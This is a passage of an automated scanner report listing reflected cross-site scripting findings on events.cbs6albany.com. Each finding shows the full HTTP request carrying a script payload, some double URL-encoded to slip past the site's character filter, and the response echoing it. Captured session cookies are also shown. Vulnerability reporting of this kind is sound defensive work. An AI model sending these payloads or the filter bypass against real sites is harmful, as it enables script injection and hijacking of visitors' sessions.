Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:57:45 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 112
ETag: "90bbb0f01fa66fa7daa63c769423b98e"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:57:45 GMT; HttpOnly
Content-Length: 15704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:title" content="Albany Performing Artse9b91"><script>alert(1)</script>5bb2d08bb55 Events" />
...[SNIP]...

4.412. http://events.cbs6albany.com/albany-ny/events/performing+arts [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/events/performing+arts

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a1daa%253cscript%253ealert%25281%2529%253c%252fscript%253ef524f3c9c61 was submitted in the REST URL parameter 3. This input was echoed as a1daa<script>alert(1)</script>f524f3c9c61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /albany-ny/events/performing+artsa1daa%253cscript%253ealert%25281%2529%253c%252fscript%253ef524f3c9c61 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 06:00:05 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 524
ETag: "5dd70bb35d7bc467849bc876b148460e"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 06:00:05 GMT; HttpOnly
Content-Length: 15608

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<h1 class="label">Albany Performing Artsa1daa<script>alert(1)</script>f524f3c9c61 Events</h1>
...[SNIP]...

4.413. http://events.cbs6albany.com/albany-ny/events/performing+arts [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/events/performing+arts

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fbbe"><script>alert(1)</script>0379cee7c4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /albany-ny/events/performing+arts?3fbbe"><script>alert(1)</script>0379cee7c4e=1 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:47:27 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 850
ETag: "7c6a4fe5e2127ec49e4352f1cc5521ca"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:47:27 GMT; HttpOnly
Content-Length: 33773

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/albany-ny/events/performing+arts?3fbbe"><script>alert(1)</script>0379cee7c4e=1" />
...[SNIP]...

4.414. http://events.cbs6albany.com/albany-ny/events/visual+arts [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://events.cbs6albany.com
Path:	/albany-ny/events/visual+arts

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc9ca"><a>b614a586adb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /albany-nydc9ca"><a>b614a586adb/events/visual+arts HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:51:59 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 565
ETag: "194ae3a287ac1425b74cd812824f4e94"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexEiCWNpdHkiC0FsYmFueSILcmFkaXVzaVAiDWxhdGl0dWRlZho0Mi42NTI1NzkyOTk5OTk5OTkAxfYiCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiDXRpbWV6b25lIhVBbWVyaWNhL05ld19Zb3JrIhNkaXNwbGF5X3N0cmluZyIPQWxiYW55LCBOWSIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU2MjMxNzAwMDAwMDAxAOy0IhF3aGVyZV9zdHJpbmdAFCIMYWRkcmVzcyIjYWxiYW55LW55ZGM5Y2EiPjxhPmI2MTRhNTg2YWRiIgpzdGF0ZSIHTlk%3D--96dd6b874ed050549e2427468a674e48c946bfc4; path=/; expires=Fri, 29-Apr-2011 05:51:59 GMT; HttpOnly
Content-Length: 24878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/albany-nydc9ca"><a>b614a586adb/events/visual+arts" />
...[SNIP]...

4.415. http://events.cbs6albany.com/albany-ny/events/visual+arts [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/events/visual+arts

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 228be%253cscript%253ealert%25281%2529%253c%252fscript%253e32854513461 was submitted in the REST URL parameter 3. This input was echoed as 228be<script>alert(1)</script>32854513461 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /albany-ny/events/visual+arts228be%253cscript%253ealert%25281%2529%253c%252fscript%253e32854513461 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:57:18 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 129
ETag: "6c9e3cdb7afefefa68721f753b9b688f"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:57:18 GMT; HttpOnly
Content-Length: 15551

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<h1 class="label">Albany Visual Arts228be<script>alert(1)</script>32854513461 Events</h1>
...[SNIP]...

4.416. http://events.cbs6albany.com/albany-ny/events/visual+arts [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/events/visual+arts

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5555%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e30292223dfa was submitted in the REST URL parameter 3. This input was echoed as a5555"><script>alert(1)</script>30292223dfa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /albany-ny/events/visual+artsa5555%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e30292223dfa HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:54:54 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 128
ETag: "aa4d5592b0cf53a77778faa741f6a45a"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:54:54 GMT; HttpOnly
Content-Length: 15648

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:title" content="Albany Visual Artsa5555"><script>alert(1)</script>30292223dfa Events" />
...[SNIP]...

4.417. http://events.cbs6albany.com/albany-ny/events/visual+arts [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/events/visual+arts

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32a03"><script>alert(1)</script>ad406b8e27b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /albany-ny/events/visual+arts?32a03"><script>alert(1)</script>ad406b8e27b=1 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:48:33 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 224
ETag: "6d9003a791c236cf186a6b1bfd7ed04c"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:48:33 GMT; HttpOnly
Content-Length: 24937

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="og:url" content="http://www.zvents.com/albany-ny/events/visual+arts?32a03"><script>alert(1)</script>ad406b8e27b=1" />
...[SNIP]...

4.418. http://events.cbs6albany.com/albany-ny/movies [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/movies

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 437b9"><script>alert(1)</script>e4ff51d4685 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /albany-ny/movies?437b9"><script>alert(1)</script>e4ff51d4685=1 HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; 